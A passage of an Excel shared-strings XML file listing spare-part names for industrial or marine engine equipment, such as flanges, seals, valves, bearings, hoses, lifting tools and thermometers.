    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,REDUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,TEE BETWEEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAE FLARE CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,SAEWITH NECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange, oval with neck</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE-OVAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange, oval special</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,TRIANGULAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-ROUND-FELT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-ROUND-RUBBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-RECTANGLE-REINZ</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING MATERIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SQUARE-SECTION SEAL,RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>O-RING,GLUED TOGETHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>X-RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASBESTOS CORD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALANT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING PASTE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICANT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE WITH HEXAGON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING ADAPTER MALE/MAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adapter, straight, female/female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE PIECE-SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELBOW COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BANJO SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE-SCREWED CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BANJO COUPLING, HOUSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sleeve,  for pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BODY OF COUPLING,STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BODY OF COUPLING, ELBOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BODY OF COUPLING, CROSS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLOSED FILTERS - WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN FILTER- WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPEN FILTER- OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHTWAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVE-DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.PLATE F.PILOT VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3/2-WAY PILOT VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3/2-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valve, screwed connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SPINDEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNION NUT WITH SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTING PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4/3-way proportional valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARTRIDGE V. CONTROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repair kit, valves-cocks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spray nozzle, with flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spray nozzle, internal thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE PLUG, OUTS.THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORIFICE FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grease nippel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC. TEST PRESSURE PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rear clevis, air cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rod clevis, air cylinder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rear eye/hinge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic accumulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Repair kit, actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RULE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometer, liquid/straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAT CONDUCTING PASTE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE EQUALIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic top bracing system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hyd. top bracing arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equipment for hydr. top bracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nut for hydr. top bracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JUNCTION BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONVERTER BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Upgrade instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GMS SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VMON UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PCB Schematic</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PCB Bill of material</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CD-ROM, SOFTWARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL VIBRATION MONITOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRONIC COMPONENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fan accesseries</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE, DUEL ARCNET KIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable, Power</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable, Control</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable, Communication</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE GLAND, REDUCING PCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE GLAND, LOCK NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE GLAND, BLIND PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE GLAND, ACCESSORIES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUSE, AUTOMATIC,RESETABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE TIES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE NUMBERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTOR-PCB, PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATING BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water in oil sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTING FOR LUMINAIRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENCLOSURE, MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAND OFF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP GLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RED LAMP GLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP GLASS, YELLOW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GREEN LAMP GLASS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP GLASS, BLUE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Water trap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN-CYL.SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Friction coupling, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALL JIONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTER LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INNER LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Chain sling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FINAL CH.LINK W.SHACKLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wire sling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SPECIAL HEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw, cheese head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure screw with ball,</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw special, cheese head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud, thread both ends</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD WITH NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT WITH LOCKING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, HEXAGON WITH COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, HEXAGON SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, ROUND F HOOK-WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, ROUND SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPAREPARTS FOR HYD. JACKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOOR HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball bearing w. foot, radial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER BEAR.W.FOOT,RADIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEEDLE BEAR.W.FOOT,RADIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEEDLE BEARING W. ROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rolling bearing w.flange housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEDDLE BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER BEAR. W.FOOT,AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING W. FLANGE, AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROLLER BEARING, AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NEEDLE BEARING, AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON WITH PISTON RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET (FOR WORKTABLE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bracket for actuator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Support for Gallery bracket</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cover w. handle, rectangular</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE, OVAL W HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING-METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCRAPER RING - AXIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET OR HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembly kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EN-std. kit (Screw-Nut-Packing)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RETURN VALVE, MALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE L-COUPL.COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJ.ELBOW COUPL.W.RESTRIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BANJO COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHEILD FOR FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF FLOW SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUTOMATIC PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORIES FOR S-SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTACT BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH-OUTS.HEX.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE HAND. KEY HEX. SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORQUE WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNIVERSAL JOINTS, SQUARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOCKET WRENCH SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN ASSEMBLING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSBAR FOR DRAWING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAWING TOOL-HYDR.JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDR., WITHOUT PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC(WITH PUMP)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDR.(WITHOUT PUMP)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-MECHANIC.(PARTS FOR)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE FOR SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE WITH INSIDE CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE WITH OUTSIDE CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE WITH IN-/OUTSIDE CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE WITH RECESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE PIN WITH FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN VICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE TOOLS-SLIDE SHOE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE TACKLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOOK IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEAM CLAW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRAVELLING TROLLEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TROLLEY 4-WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TROLLEY 2-WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS FOR TROLLEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCING RING ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL F.HYDR.MOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER-SPECIAL-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCISSORS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING WHEEL WITHOUT GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING WHEEL OUTSIDE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXT.SOCKET FOR HYDRAULICS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING TOOL WITH INSERTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BORING BAR WITH INSERTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER FOR SCRAPER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING BRUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING+CHECKING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MICROMETER HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAND FOR DIAL GAGUE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLANEMETER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN GAUGE-STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN GAUGE SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TESTING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTMENT-FITTING GAUGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIRROR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-ST., ROLLED, CONICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-STRAIGHT WITH HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-STRAIGHT W. STUBS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE, BENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE-STEEL WITH 1 FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE-STEEL WITH 2 FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE WITH UNIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE ASSEMBLY 1-2 HOSES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE ASSEMBLY 3 HOSES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE ASSEMBLY 5 HOSES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE,STRAIGHT, W.1 FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE,STRAIGHT, W.2 FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE,BEND, W. 2 FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORSKRUNING WITH FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING-ON STUBS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUNNEL WITH PLAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange, circular with neck</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>El. heating cyl. oil. pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING MATERIAL,ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REDUCING ADAPTER FEM/FEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE,SCREWED CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUGS FOR COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE T-UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUICK COUPLING FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG, EXPANDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPENSATOR, STARTING AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALVE.0-15</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALVE-ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE WITH ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVE-HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUTTERFLY VALVE-FLAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3/2-WAY SOLENOID VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4/2-WAY SOLENOID VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5/2-WAY SOLENOID VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4/2-WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3/2-WAY MANUAL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5/2-WAY MANUAL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5/3 Way Manuel valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOAT VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL VALVE STRAIGHTWAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIRECTIONAL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCK WITH ANGLE PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COCK WITH 3-WAY PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valve, welded connection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valve, manifold mount</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spindle Complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARTRIDGE VALVE, 2-WAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARTRIDGE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL COVER,CARTRIDGE V</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL COVER+CONTROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure relief valve, Cartrigde</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spray nozzle, plain</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRAY NOZZLE, EXT. THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUALISING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP-SCREW WHEEL TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP-GEAR WHEEL TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP-PISTON TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP-CENTRIFUGAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GREASE GUN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOOSTER ACCUMULATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOMOGENIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometer/temperature sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOMETER-STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometer, liquid/angle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOMETER,DIAL TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
